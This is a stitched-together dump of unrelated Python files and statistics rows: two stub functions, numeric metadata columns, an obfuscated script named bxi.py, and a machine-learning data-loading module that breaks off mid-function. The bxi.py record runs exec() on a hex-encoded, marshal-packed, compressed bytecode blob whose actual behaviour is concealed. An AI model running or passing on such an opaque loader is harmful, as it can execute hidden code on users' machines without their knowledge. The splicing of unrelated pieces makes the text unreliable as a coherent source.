def set_box_to_system(item, indices='all', frame_indices='all', value=None):
raise NotImplementedError
def set_coordinates_to_system(item, indices='all', frame_indices='all', value=None):
raise NotImplementedError
| 34.416928
| 136
| 0.776665
| 1,564
| 10,979
| 5.089514
| 0.070332
| 0.232161
| 0.238693
| 0.143719
| 0.834673
| 0.820352
| 0.812563
| 0.797487
| 0.78706
| 0.752261
| 0
| 0.000311
| 0.122051
| 10,979
| 318
| 137
| 34.525157
| 0.825501
| 0.005192
| 0
| 0.401198
| 0
| 0
| 0.037537
| 0.00312
| 0
| 0
| 0
| 0
| 0
| 1
| 0.335329
| false
| 0
| 0.083832
| 0.257485
| 0.718563
| 0
| 0
| 0
| 0
| null | 1
| 1
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 1
| 1
| 0
|
0
| 11
|
f66d895d318123e038fb426fa906dde99164f125
| 13,018
|
py
|
Python
|
bxi.py
|
Ahsan2020xpos/bxi
|
88d20c3778aa71ada64fac687afc007b6baab095
|
[
"Apache-2.0"
] | null | null | null |
bxi.py
|
Ahsan2020xpos/bxi
|
88d20c3778aa71ada64fac687afc007b6baab095
|
[
"Apache-2.0"
] | null | null | null |
bxi.py
|
Ahsan2020xpos/bxi
|
88d20c3778aa71ada64fac687afc007b6baab095
|
[
"Apache-2.0"
] | null | null | null |
# Auther : Ahsan
# GitHub : https://github.com/Binyamin-binni
# YouTube Channel : Tricker Ahsan
import base64
exec(base64.b16decode('2320436F6D70696C6564204279203A2042696E79616D696E0A2320476974487562203A2068747470733A2F2F6769746875622E636F6D2F42696E79616D696E2D62696E6E690A2320596F7554756265204368616E6E656C203A20547269636B2050726F6F660A696D706F7274206D61727368616C0A65786563286D61727368616C2E6C6F6164732827635C7830305C7830305C7830305C7830305C7830305C7830305C7830305C7830305C7830335C7830305C7830305C783030405C7830305C7830305C78303073215C7830305C7830305C783030645C7830305C783030645C7830315C7830306C5C7830305C7830305A5C7830305C783030655C7830305C7830306A5C7830315C783030645C7830325C7830305C7838335C7830315C783030645C7830315C7830305C78303455645C7830315C78303053285C7830335C7830305C7830305C783030695C7866665C7866665C7866665C7866664E735C7866395C7830375C7830305C783030785C7839635C786564586D735C7864625C7862385C7831315C7866652C5C7866645C6E5C7838346D4D5C7861615C786136484A5C786236645C7864395C7831655C786235235C7862665C7863355C7839655C7864385C7839365C7863365C7839365C7839335E5C7831645C7830665C7830625C7839325C7861305C7838345C783133495C786230205C7831395C7864395C7862395C7862395C7866667E5C7830625C786630455C783934645C275C7839375C7862625C7839397E2A3231495C7865635C7865325C7864395C7863355C7862655C7830324A5C7866395C786362515C7831335C7863315C786130615C786363785C783861585C7861325C272F5C7838395C7839655C7864325C7839305C7865385C7831654E5C7838397C5C786531385C786632585C7861385C78636671325C7830665C7861385C786133735C7861325C786137734E5C786230475C7861335C7839395C786665735C786332223D5C7865335C783831205C7862385C7838632D285C7831316F335C7839325C78633638495C7866345C7839305C786238735C7831635C7864315C7861665C783830415C7866655C7839625C783931244D745C7865375C78393946525C7861325C786366595C7838385C7863322C48695C7863635C7839394B5C7839325C7830345C7865305C7838635C7839385C7862315C7861305C786434652A5C7838354C60665C7863355F5C7863325C7831385C7865345C78643925714A595C7839345C7839345C7865635C7861372C5C7838615C7838382B5C7861365C78636539675C786263265C786133545C7861325C7865343C5C7865316C5C7839395C7831305C7864655C786363315C7864305C7839355C7839635C7839355C783862725B5C7862305C7863345C783030235C786134245C7864345C7864345C7839385C7863365D445C786133245C78633541505C74575B5C786466645C7861625C7865347D5C7838374F585C7865325C7831355C7839365C7863355C7861635C7865325C7838385C783938477E2E5C7863355C74575C7831384940485C786163755C786236575C7862645C786134735C783136755C78393171773E3A5C7862623937425C7830665635395C745C7831385C78663634606A355C7865315C7838665C7839315C7839305C786434233E5C7830365C7839625C7839335C786338655C7863325C7837665C7839615C7839615C7861355C7866655C783030785C7831645C7838655C7838362B5C7863645C7838645C786332445C783961205C78383865365C7863637B5C7830315C7862313973585C783961685C78313738485C7863385C7831365C7838645C7866385C78396324736D5C783835625C7863665C78643334362E5C7861375C7864335C7863395D4E5C7839625C7865345C783965665C7830305C7861635C7838375C7866385C7864395C7831367B5C78316176245C7831305C7866365C786263395C7862385C7839625C7866305C7830345C783134795C7830345C786264407C5C7831625C786366485C7839345C7861615C7862617A5C7838365C7838332F7461765C7838635C78626561215C7865645C783961465C7864395C786633317A38465C7861335C7863385C7865335C7838637A685C7864665C786438375C7862615C7863375C7865385C7866365F5C7862645C7831653A5C786339685C7865305C7839395C7831665C7863365C7864335E5C7863665C7865615C7862375C7864305C7865335C7863355C7863395C7865385C7864365C786263385C7864395C7831665C7831645C7863335C786462475C786233635C7830315C7830365C7866635C7865625C7866365C7838645C7866655C7830305C7861364E3E5C7839615C7866625C786264436B5C7862665C7864335C7862375C7865305C7865625C7865635C7863365C7866635C7863352351425C7864335C7839375C7865315C783965615C7865394B5C7865615C7861355C786633615C7863375C783161585C7866615C7839635C7864305C7864393C5C783164765C7830655C7862625C7864365C7861665C786330797D6A5C7864325C7864345C7862655C7839615C7863325C7865625C7864645C7831615C7863345C7865395C78396439615C7865305C7839355C7831625C7865365C7864305C7838305C7863305C7863345C7863645C7838355C7838395C7839332C5C7831315C7862325C7863655C7863615C7862375C7863395C7861645C7865395C7862325C7864305C7866305C7862314B5C7831635C7863385C783161635C783831535C783163615C7861315C7863304773745C786666706F5C7866665C7864625C78623246675C7866307D5C7866665C7864315C7865635C7831395C783032763C313B5C7830327D643E5C7830665C786661475C7839385C7838375C7830343B5C7862345C7866645C7865355C7830305C7831663F5C7861395C7861645C78613766225C7831325C78383845605C7862622A455C7865655C786633295C7866306141345C6E5C7830335C783162592C725B5C786662457D5C783130465C78316549235C7831665C7861315C7866665B5C7866395C786462565C7866655C7862355C7864355C786163655C7839635C7831625C7831305C786363455C7839325C786664455C783063743D7E3F465C7866325C7862355C7831395C7862305C7831395C7831625C7861615C7861615C7864615C7831635C7831345C7863335C7863315C7830385C725C783163545C7830636F5C7830305F5C7866305C786266295C7866655C7838385C7861315C6E5C7864614F5C7830335D5C7862635C7865625C7838335C745C786461205C786537535C7866665C7831314C5C78646540452B5C7862322D467B305C783931735C783030205C786639565C7865345C7862365C7831635C783033472F5C7861345C7839365C7831615C7861635C7838314B5C7864385C5C445C7861315C7863315C7831615C7831395C783062422135672D5C7863385C7866395C7831305C7861324B5C7861395C7830325C78613020375C7864623F3C5C7839614D345C7863615C786432395C7865315C783830735C7838344E685C7866345C783832435C7864315C275C7864655C7864335C78663432735C7865345C7861345C786138255C7863395C783931695C786365683A5C7863665C7831635C7830335C7831636B3A5C7830355F5C7831625E225C786461443F5C7862316C5C7839613944704F39755C7831375C7830385C7865615C725C7866335C7839625C7865385C7830345C5C5C7839325C7863342C5C7861645C7861315C7861345C7838325C7831655C7830625C7862325C7865315C783134545C7830315C7866395C78383774475C7864665C783139225C7831365C7839615C7861375C78386373684F225C786533225C7831635C78313248545C786235545F2D5C7838395C7831335C7865385C7839394B5C7863363D497C5C7861365C7862302A602C5C7831365F295C7863665C7838385C7864615C5C5C786365215C7864365C7839315C7839364F5C7839365C7862335C7861645C786263695C7863355C78396346295C7831325C7862315C273F5C7862335C7839355C7831635C7838655C783937365C7838645C7865322C5C78643554345C7831645C7838665C7861665C7864315C7863335C7866645C7866395C7864645C7865645C7865385C7865365C783163523E6F245C786434475C7864616A5C7863315C7831306D5C7865385A48685C7863342B5C7866355C786236305C275C7861335C7866625C7866624F5C7865335C7862625C7862335C6E5C7862335C7863345D2D5C786161705C7863626D5C7831365C7862385C7865355C786338775C7861305C7861326B365C7839625C7831315C7830665C783961204A32575C7862345C7830623F5C7830625C7838325C7831375C7838345C7831335C7861305C786564565C7831625B5B5C7862615C7864645C7831625C786362515C7831615C7864305C7831375C7831644B5C786164485C7830345C7862655E5C7839375C7866655C7838395C786233685C7838362A4F5C786263535C7864375C7862386A5C7830355C7865305C7864395C7839625C786235594C5C7861325C7865665C7838355C7839345C7864395C7862355C7862615C78393669755C7863645C7838382C5C7864625C7830625C6E5C275C786135685C7864365C7838365C7866395C7831305C786261665C786432667E3B253C5C7863635C7839655C7864623E5C7865335C7863363C5C725C7830335C7862355C7866355C7839365C7863345C7862325C7865346C6F605D5C7866392A5C7863366A5C7863615C7866666F5C7831355C7837664369315C783961705C7830325C7830315C7837662D345C7866307E235C7861355C786630265C7866615C7862646A5C7838383C5C786431555C786333285C7831655C7838367C6C4F3E355C783162205C783066315C7831315C78316572355C786130345C7865345C786636355C786635335C7837665C7864637D5C7831325C7865315C7830335C7838615C7861325C7861625C7830385C7861395C7862625C7861635C7861355C7831665C7863625C7838334F5C7865615C7862312C355C786663205C7838335C786633495C786562783D5C5C5C786134465C7861655C7861335C7862355C7862364E5C783766555C7838645C7839373A5C7839375C7830635C7864625C786331265C7865395C7838315C7839305C7866625C725C7831305C7862395C7862343C6E5C7863625C7830665C78623620296C5E5C786638425C7831335C78626233545C7831645C7861395C78666375335C7862657A5C7863305C7839335C7838315C7839305C783166625C7862355C7830665C786534455C783165615C7866355C7861625C7862317C5C7864365C7839325C7861625C7830365C786333435C7864345C7865363E5C7839325C7863327E5C7839375C7862625C7866325C7863385C786432445D5C7864395C783961545C7831663B5C7838355C7862395C7864315C27285C7863615C7865383C5C78633434306F5C7862335C7864305C7838313A5C7830654152655C786431365C7839655C7866615C7864385D5B3A5C7839325C7838395C7838655C786136605C783932685C7839625B795C7864637B425C7865664944385C7831635B5C786436785C7839352D5C7864655C7839655C786635775C7862355D5C7838335C7839306E5C7862315C786464395C7861332E5C786431365C786332705C7839645C7839365C7831625C786363715C7865375C7865625C7866355C786564335C7831635C786161605C7866635C7830335C7864355C7861615C786135645C7838325C7831655C7862665C7839395C7838315C7862305C786166774F5C7865385C78303272455C7863345C7861375C7839625C7839375C7862625C78653065535C7831645C7861645C7863635C7865315C78313554577D5C7864355F5C7862665C7863625C783164705C7862655C7831395C7864365C783062325C7839387D5C7863334C5C7865385C783932705C786232565C783961655C7830365C7861655C783130203B5C7838365C786562715C786238545C7864375C7863395C7863365C7839325338335C7838325C7861635C783864793760495C7864645C7862325C78393525765C7839663E5B7B7B5C7838665C7839645C7865335C7863336E585C7866385C786261565C78643051493C5C7830385C7864375C7864347A5C7861645C7839305C7837665C786162782D5C7839374B5C7865335C7830355C7866345C7838305C7862652F5C7838625C7839365B2B673F5C7839614A355C783766746A5C7866655C7839303E5C7865626C3B4D5C786439536A5C7864395C5C4F5C78656452645C7862385C786630285C7864375C783134305C7861395C745C7866645C7862635C7831365C786163455C7864365C7838655C7865666B5C7864375C7863656D555C7831355C786437435C7837665C7862645C7831635C7864665C7839635C7838625C7864355C7861365C7838315C725C7862345C7862335C7838335C7861323844703D5C786534695C7831646E5C7861625C7839645C786435405C7838615C7839635C7861665C7830316D5C7861395C7862335C786231225C7866635C7862325C7863655C7862645C7861655C7863345C7864625C7865625C786465525C7862375C7862385C7863665C7866655C7866385C7863325C7863647D5C7838615C7862315C7863615C7864635C7838655C78656321755C7831385C7839312D5C7863305C7864655C7839305C786365683452675C7862385D5C5C5C7831625C7866355C7831355C7864625C786231205C7839365C7837665C7861335C786136365E5C7839355C786437585C7863625C7863625C786561535C7861645C7861395C725C7831375C7838345C7861625B5C7866345C7865396A7A5C7838392E465C7861375C7865375C275C7865335C7866315C7830375C786134565C7862635C7866305C7861345C7864345C786162675C7862316865792935655D3D5C7863615C7862395C7838315C745C7831385C724E5C7865325C7830306E355C7839615C7838325C7831345D5C78633935587A5C7863335C786532675C7831375C786133785C786536205C786435515C786136405C786338335C7862665C7864315C7838302B205C7838364A5C783037576F69235C7861354C285C7861375C783864635C7862615C786261335C7838395C7839635C6E5C74585C78633933315C7839635C7864305C72695C7866395C783766625C7839395C7863375C78623668615C7864315C7862305C78626277705C7864303B3C5C7862345C7830657B5C7838375C7839647E5C7861665C7866375C7862376E5C7861665C7864623B385C7862355C7866635C7863655C7862655C7838355C786231433C5C7864665C7865395C7866375C7862305C7864623D5C7863305C7830377B5C7838375C7863345C7865625C7865306E5C7862375C7862665C78653774765C7861305C7838665C783837385C7831645C7838615F5C783930765C7831326F615C7837665C7838315C786162295C786463525C7838375C7839645C78316422363C5476355C7865615C786235765C7839355C7839645C7838305C7862393820435C7831325C7864395C7830665C7866373B5C78653579525C783930615C7863665C7838325C7830655C7838625C7838375C783934253B5C7862335C786132435C7864385C7863357D5C7864375C7863655C7837665C7839304A5C783030315C7861315C7862335C7865315C7839655C7864665C7865625C7866355C7866635C78633343505C7861375C7865335C7862625C7864655C7830315C7863365C7839365C7862625C7862665C7865665C7866375C7830367E5C7861665C786462257E5F5C7839615C7866315C7861625C7864345C7863375C7839305C7862665C7839625C7830385C783062495C7839625C786662485C7861646F585C7831355C7863355C7866645C7861625C7838385C7830355C7865315C7864385C7861345C7865615C786531225C7863665C7245475C78636152425C7865355C7863345C7861326E7E7D545C7865615C7831305C786361535C7838645C7861335C7861635C7861305C7866395C7863345C7831665C7861615C7839665C7866395C7864325C7866355C7865615C7839395C7863665C7866645C7838395C7864615C7862395C74505C7838625C7866375C725C7863325C786562695C7864345C7863385C786362525C7863655C7246545C7838345C7862637A60295C7864325C7839305C7838665C6E5C7831315C786339655C7838375C7863394C792A5C7864395C7865625C7839365C7838304E5C78633632785C7839625C7863335C7831355C78303023774E404526485C7865662A255C7864665C7864615C7862645C783138555C7866395C7863655C7861375C7865614A5C7864355C78613544795C7862325C7838395C7866625C7830355C7861325C7839655C7838395C7861615C7838625C7830624D5C786430525C7839655C7861625C783766585C5C5C7861335C745C7862625C7862366D715C7831365C7862376D682A5C7862365C725C7838315C7831645C786439765C7864315B5C7838615C7862335C7863306F5C7863615C786561235C783862285C7830325C7830305C7830305C783030745C7830345C7830305C7830305C7830307A6C6962745C6E5C7830305C7830305C7830306465636F6D7072657373285C7830305C7830305C7830305C783030285C7830305C7830305C7830305C783030285C7830305C7830305C7830305C783030735C7830345C7830305C7830305C7830305C7831625B306D745C7830385C7830305C7830305C7830303C6D6F64756C653E5C7830345C7830305C7830305C783030735C7830325C7830305C7830305C7830305C7830635C783031272929'))
| 2,603.6
| 12,908
| 0.997311
| 18
| 13,018
| 721.277778
| 0.833333
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.857022
| 0.001229
| 13,018
| 5
| 12,908
| 2,603.6
| 0.141517
| 0.006837
| 0
| 0
| 0
| 0
| 0.996596
| 0.996596
| 0
| 1
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0.5
| 0
| 0.5
| 0
| 1
| 0
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| null | 1
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 0
|
0
| 12
|
f674aa16f5b49755ef43f5b43dd8ed744676eee2
| 33,473
|
py
|
Python
|
data_loading.py
|
se7endragon/cnn_model
|
21d76edfa73bd679182430341979f8d17f7b2940
|
[
"MIT"
] | null | null | null |
data_loading.py
|
se7endragon/cnn_model
|
21d76edfa73bd679182430341979f8d17f7b2940
|
[
"MIT"
] | null | null | null |
data_loading.py
|
se7endragon/cnn_model
|
21d76edfa73bd679182430341979f8d17f7b2940
|
[
"MIT"
] | null | null | null |
import tensorflow as tf
import numpy as np
import pandas as pd
import os
import matplotlib.pyplot as plt
from matplotlib.image import imread, cm
from mpl_toolkits.mplot3d import Axes3D
from IPython.display import Image, display
from copy import deepcopy
from sklearn import datasets
import inception # module from Hvass Labs
import cache # module from Hvass Labs
import dataset # module from Hvass Labs
import download # module from Hvass Labs
import cifar10 # module from Hvass Labs
import knifey # module from Hvass Labs
from inception import NameLookup # module from Hvass Labs
from inception import transfer_values_cache # module from Hvass Labs
def load_two_asset_daily_return_data():
start = "2017-01-01"
end = "2017-12-31"
dates = pd.date_range(start, end)
ticker_list = ["SPY", "WMT"]
benchmark = "SPY"
data_dir = "./data/dow30"
for data_type in ["Open", "High", "Low", "Close", "Adj Close", "Volume"]:
df = pd.DataFrame(index=dates)
for ticker in ticker_list:
csv_file_path = os.path.join(data_dir, ticker + ".CSV")
df_temp = pd.read_csv(csv_file_path,
index_col="Date",
parse_dates=True,
usecols=["Date", data_type],
na_values=["null"])
df_temp = df_temp.rename(columns={data_type: ticker})
df = df.join(df_temp)
if ticker == benchmark:
df = df.dropna(subset=[benchmark])
if data_type == "Open":
df_open = df
if data_type == "High":
df_high = df
if data_type == "Low":
df_low = df
if data_type == "Close":
df_close = df
if data_type == "Adj Close":
df_adj_close = df
if data_type == "Volume":
df_volume = df
df_daily_return = df_adj_close.pct_change()
spy = np.array(df_daily_return.SPY).reshape(-1, 1).astype(np.float32)[1:]
wmt = np.array(df_daily_return.WMT).reshape(-1, 1).astype(np.float32)[1:]
data = (spy, wmt)
return data
if __name__ == '__main__':
print("load_two_asset_daily_return_data")
print()
spy, wmt = load_two_asset_daily_return_data()
print(type(spy))
print(type(wmt))
print(spy.shape)
print(wmt.shape)
plt.plot(spy, wmt, 'o')
plt.xlabel('SPY daily return')
plt.ylabel('WMT daily return')
plt.show()
def load_2_factor_diabetes_data():
diabetes = datasets.load_diabetes()
x_train = diabetes.data[:, 2:4][:-20, :].astype(np.float32) # use two features
x_test = diabetes.data[:, 2:4][-20:, :].astype(np.float32) # use two features
y_train = diabetes.target[:-20].reshape(-1, 1).astype(np.float32)
y_test = diabetes.target[-20:].reshape(-1, 1).astype(np.float32)
data = (x_train, y_train, x_test, y_test)
return data
if __name__ == '__main__':
print("load_2_factor_diabetes_data")
print()
data = load_2_factor_diabetes_data()
x_train, x_test, y_train, y_test = data
print("x_train.shape : ", x_train.shape)
print("x_test.shape : ", x_test.shape)
print("y_train.shape : ", y_train.shape)
print("y_test.shape : ", y_test.shape)
print()
print("x_train.dtype : ", x_train.dtype)
print("x_test.dtype : ", x_test.dtype)
print("y_train.dtype : ", y_train.dtype)
print("y_test.dtypee : ", y_test.dtype)
print()
print("type(x_train) : ", type(x_train))
print("type(x_test) : ", type(x_test))
print("type(y_train) : ", type(y_train))
print("type(y_test) : ", type(y_test))
print()
print("min and max of x_train : ", np.min(x_train), np.max(x_train))
print("min and max of x_test : ", np.min(x_test), np.max(x_test))
print("min and max of y_train : ", np.min(y_train), np.max(y_train))
print("min and max of y_test : ", np.min(y_test), np.max(y_test))
print()
def load_noisy_bowl():
x = np.arange(-1, 1, 0.05)
y = np.arange(-1, 1, 0.05)
x_grid, y_grid = np.meshgrid(x, y)
z0_grid = x_grid**2 + y_grid**2
np.random.seed(1)
ep = np.random.randn(x_grid.shape[0], x_grid.shape[1])
z_grid = z0_grid + 0.3 * ep
X = x_grid.reshape([-1, 1])
Y = y_grid.reshape([-1, 1])
Z = z_grid.reshape([-1, 1])
data = np.hstack([X, Y, Z]).astype(np.float32)
return data
if __name__ == '__main__':
print("load_noisy_bowl")
print()
data = load_noisy_bowl()
x_grid = data[:, 0].reshape(40, 40)
y_grid = data[:, 1].reshape(40, 40)
z_grid = data[:, 2].reshape(40, 40)
fig = plt.figure()
ax = fig.gca(projection='3d')
ax.plot_surface(x_grid, y_grid, z_grid, rstride=1, cstride=1,
cmap=cm.coolwarm, linewidth=0, antialiased=False)
ax.set_title('Noisy Bowl')
ax.set_xlabel('X')
ax.set_ylabel('Y')
ax.set_zlabel('Z')
ax.set_xlim([-1.5, 1.5])
ax.set_ylim([-1.5, 1.5])
ax.set_zlim([-1.0, 2.5])
plt.show()
def load_noisy_bowl_for_linear_regression():
x = np.arange(-1, 1, 0.05)
y = np.arange(-1, 1, 0.05)
x_grid, y_grid = np.meshgrid(x, y)
z0_grid = x_grid**2 + y_grid**2
np.random.seed(1)
ep = np.random.randn(x_grid.shape[0], x_grid.shape[1])
z_grid = z0_grid + 0.3 * ep
X = x_grid.reshape([-1, 1])
Y = y_grid.reshape([-1, 1])
Z = z_grid.reshape([-1, 1])
x_train = np.hstack([X, Y]).astype(np.float32)
y_train = Z.astype(np.float32)
data = (x_train, y_train)
return data
if __name__ == '__main__':
print("load_noisy_bowl_for_linear_regression")
print()
x_train, y_train = load_noisy_bowl_for_linear_regression()
x_grid = x_train[:, 0].reshape(40, 40)
y_grid = x_train[:, 1].reshape(40, 40)
z_grid = y_train.reshape(40, 40)
fig = plt.figure()
ax = fig.gca(projection='3d')
ax.plot_surface(x_grid, y_grid, z_grid, rstride=1, cstride=1,
cmap=cm.coolwarm, linewidth=0, antialiased=False)
ax.set_title('Noisy Bowl')
ax.set_xlabel('X')
ax.set_ylabel('Y')
ax.set_zlabel('Z')
ax.set_xlim([-1.5, 1.5])
ax.set_ylim([-1.5, 1.5])
ax.set_zlim([-1.0, 2.5])
plt.show()
def load_mnist():
mnist = tf.keras.datasets.mnist
(x_train, y_train), (x_test, y_test) = mnist.load_data()
x_train, x_test = x_train / 255.0, x_test / 255.0
x_train, x_test = x_train.reshape((-1, 28, 28, 1)), x_test.reshape((-1, 28, 28, 1))
x_train, x_test = x_train.astype(np.float32), x_test.astype(np.float32)
y_train_cls = deepcopy(y_train).astype(np.int32)
y_test_cls = deepcopy(y_test).astype(np.int32)
y_train = np.eye(10)[y_train].astype(np.float32)
y_test = np.eye(10)[y_test].astype(np.float32)
data = (x_train, x_test, y_train, y_test, y_train_cls, y_test_cls)
return data
if __name__ == '__main__':
print("load_mnist")
print()
data = load_mnist()
x_train, x_test, y_train, y_test, y_train_cls, y_test_cls = data
print("x_train.shape : ", x_train.shape)
print("x_test.shape : ", x_test.shape)
print("y_train.shape : ", y_train.shape)
print("y_test.shape : ", y_test.shape)
print("y_train_cls.shape : ", y_train_cls.shape)
print("y_test_cls.shape : ", y_test_cls.shape)
print()
print("x_train.dtype : ", x_train.dtype)
print("x_test.dtype : ", x_test.dtype)
print("y_train.dtype : ", y_train.dtype)
print("y_test.dtypee : ", y_test.dtype)
print("y_train_cls.dtype : ", y_train_cls.dtype)
print("y_test_cls.dtype : ", y_test_cls.dtype)
print()
print("type(x_train) : ", type(x_train))
print("type(x_test) : ", type(x_test))
print("type(y_train) : ", type(y_train))
print("type(y_test) : ", type(y_test))
print("type(y_train_cls) : ", type(y_train_cls))
print("type(y_test_cls) : ", type(y_test_cls))
print()
print("min and max of x_train : ", np.min(x_train), np.max(x_train))
print("min and max of x_test : ", np.min(x_test), np.max(x_test))
print("min and max of y_train : ", np.min(y_train), np.max(y_train))
print("min and max of y_test : ", np.min(y_test), np.max(y_test))
print("min and max of y_train_cls : ", np.min(y_train_cls), np.max(y_train_cls))
print("min and max of y_test_cls : ", np.min(y_test_cls), np.max(y_test_cls))
print()
def load_mnist_flat():
mnist = tf.keras.datasets.mnist
(x_train, y_train), (x_test, y_test) = mnist.load_data()
x_train, x_test = x_train / 255.0, x_test / 255.0
x_train, x_test = x_train.reshape((-1, 784)), x_test.reshape((-1, 784))
x_train, x_test = x_train.astype(np.float32), x_test.astype(np.float32)
y_train_cls = deepcopy(y_train).astype(np.int32)
y_test_cls = deepcopy(y_test).astype(np.int32)
y_train = np.eye(10)[y_train].astype(np.float32)
y_test = np.eye(10)[y_test].astype(np.float32)
data = (x_train, x_test, y_train, y_test, y_train_cls, y_test_cls)
return data
if __name__ == '__main__':
print("load_mnist_flat")
print()
data = load_mnist_flat()
x_train, x_test, y_train, y_test, y_train_cls, y_test_cls = data
print("x_train.shape : ", x_train.shape)
print("x_test.shape : ", x_test.shape)
print("y_train.shape : ", y_train.shape)
print("y_test.shape : ", y_test.shape)
print("y_train_cls.shape : ", y_train_cls.shape)
print("y_test_cls.shape : ", y_test_cls.shape)
print()
print("x_train.dtype : ", x_train.dtype)
print("x_test.dtype : ", x_test.dtype)
print("y_train.dtype : ", y_train.dtype)
print("y_test.dtypee : ", y_test.dtype)
print("y_train_cls.dtype : ", y_train_cls.dtype)
print("y_test_cls.dtype : ", y_test_cls.dtype)
print()
print("type(x_train) : ", type(x_train))
print("type(x_test) : ", type(x_test))
print("type(y_train) : ", type(y_train))
print("type(y_test) : ", type(y_test))
print("type(y_train_cls) : ", type(y_train_cls))
print("type(y_test_cls) : ", type(y_test_cls))
print()
print("min and max of x_train : ", np.min(x_train), np.max(x_train))
print("min and max of x_test : ", np.min(x_test), np.max(x_test))
print("min and max of y_train : ", np.min(y_train), np.max(y_train))
print("min and max of y_test : ", np.min(y_test), np.max(y_test))
print("min and max of y_train_cls : ", np.min(y_train_cls), np.max(y_train_cls))
print("min and max of y_test_cls : ", np.min(y_test_cls), np.max(y_test_cls))
print()
def load_fashion_mnist():
fashion_mnist = tf.keras.datasets.fashion_mnist
(x_train, y_train), (x_test, y_test) = fashion_mnist.load_data()
x_train, x_test = x_train / 255.0, x_test / 255.0
x_train, x_test = x_train.reshape((-1, 28, 28, 1)), x_test.reshape((-1, 28, 28, 1))
x_train, x_test = x_train.astype(np.float32), x_test.astype(np.float32)
y_train_cls = deepcopy(y_train).astype(np.int32)
y_test_cls = deepcopy(y_test).astype(np.int32)
y_train = np.eye(10)[y_train].astype(np.float32)
y_test = np.eye(10)[y_test].astype(np.float32)
class_names = ["T-shirt/top", "Trouser", "Pullover", "Dress", "Coat", "Sandal", "Shirt", "Sneaker", "Bag", "Ankle boot"]
data = (x_train, x_test, y_train, y_test, y_train_cls, y_test_cls, class_names)
return data
if __name__ == '__main__':
print("load_fashion_mnist")
print()
data = load_fashion_mnist()
x_train, x_test, y_train, y_test, y_train_cls, y_test_cls, class_names = data
print("class_names : ", class_names)
print()
print("x_train.shape : ", x_train.shape)
print("x_test.shape : ", x_test.shape)
print("y_train.shape : ", y_train.shape)
print("y_test.shape : ", y_test.shape)
print("y_train_cls.shape : ", y_train_cls.shape)
print("y_test_cls.shape : ", y_test_cls.shape)
print()
print("x_train.dtype : ", x_train.dtype)
print("x_test.dtype : ", x_test.dtype)
print("y_train.dtype : ", y_train.dtype)
print("y_test.dtypee : ", y_test.dtype)
print("y_train_cls.dtype : ", y_train_cls.dtype)
print("y_test_cls.dtype : ", y_test_cls.dtype)
print()
print("type(x_train) : ", type(x_train))
print("type(x_test) : ", type(x_test))
print("type(y_train) : ", type(y_train))
print("type(y_test) : ", type(y_test))
print("type(y_train_cls) : ", type(y_train_cls))
print("type(y_test_cls) : ", type(y_test_cls))
print()
print("min and max of x_train : ", np.min(x_train), np.max(x_train))
print("min and max of x_test : ", np.min(x_test), np.max(x_test))
print("min and max of y_train : ", np.min(y_train), np.max(y_train))
print("min and max of y_test : ", np.min(y_test), np.max(y_test))
print("min and max of y_train_cls : ", np.min(y_train_cls), np.max(y_train_cls))
print("min and max of y_test_cls : ", np.min(y_test_cls), np.max(y_test_cls))
print()
def load_fashion_mnist_flat():
fashion_mnist = tf.keras.datasets.fashion_mnist
(x_train, y_train), (x_test, y_test) = fashion_mnist.load_data()
x_train, x_test = x_train / 255.0, x_test / 255.0
x_train, x_test = x_train.reshape((-1, 784)), x_test.reshape((-1, 784))
x_train, x_test = x_train.astype(np.float32), x_test.astype(np.float32)
y_train_cls = deepcopy(y_train).astype(np.int32)
y_test_cls = deepcopy(y_test).astype(np.int32)
y_train = np.eye(10)[y_train].astype(np.float32)
y_test = np.eye(10)[y_test].astype(np.float32)
class_names = ["T-shirt/top", "Trouser", "Pullover", "Dress", "Coat", "Sandal", "Shirt", "Sneaker", "Bag", "Ankle boot"]
data = (x_train, x_test, y_train, y_test, y_train_cls, y_test_cls, class_names)
return data
if __name__ == '__main__':
print("load_fashion_mnist_flat")
print()
data = load_fashion_mnist_flat()
x_train, x_test, y_train, y_test, y_train_cls, y_test_cls, class_names = data
print("class_names : ", class_names)
print()
print("x_train.shape : ", x_train.shape)
print("x_test.shape : ", x_test.shape)
print("y_train.shape : ", y_train.shape)
print("y_test.shape : ", y_test.shape)
print("y_train_cls.shape : ", y_train_cls.shape)
print("y_test_cls.shape : ", y_test_cls.shape)
print()
print("x_train.dtype : ", x_train.dtype)
print("x_test.dtype : ", x_test.dtype)
print("y_train.dtype : ", y_train.dtype)
print("y_test.dtypee : ", y_test.dtype)
print("y_train_cls.dtype : ", y_train_cls.dtype)
print("y_test_cls.dtype : ", y_test_cls.dtype)
print()
print("type(x_train) : ", type(x_train))
print("type(x_test) : ", type(x_test))
print("type(y_train) : ", type(y_train))
print("type(y_test) : ", type(y_test))
print("type(y_train_cls) : ", type(y_train_cls))
print("type(y_test_cls) : ", type(y_test_cls))
print()
print("min and max of x_train : ", np.min(x_train), np.max(x_train))
print("min and max of x_test : ", np.min(x_test), np.max(x_test))
print("min and max of y_train : ", np.min(y_train), np.max(y_train))
print("min and max of y_test : ", np.min(y_test), np.max(y_test))
print("min and max of y_train_cls : ", np.min(y_train_cls), np.max(y_train_cls))
print("min and max of y_test_cls : ", np.min(y_test_cls), np.max(y_test_cls))
print()
def load_cifar10():
# make directory if not exist
if not os.path.isdir("data"):
os.mkdir("data")
if not os.path.isdir("data/CIFAR-10"):
os.mkdir("data/CIFAR-10")
# download and extract if not done yet
# data is downloaded from data_url = "https://www.cs.toronto.edu/~kriz/cifar-10-python.tar.gz"
# to data_path = "data/CIFAR-10/"
cifar10.data_path = "data/CIFAR-10/"
cifar10.maybe_download_and_extract()
# load data
x_train, y_train_cls, y_train = cifar10.load_training_data()
x_test, y_test_cls, y_test = cifar10.load_test_data()
class_names = cifar10.load_class_names()
x_train = x_train.astype(np.float32)
y_train_cls = y_train_cls.astype(np.int32)
y_train = y_train.astype(np.float32)
x_test = x_test.astype(np.float32)
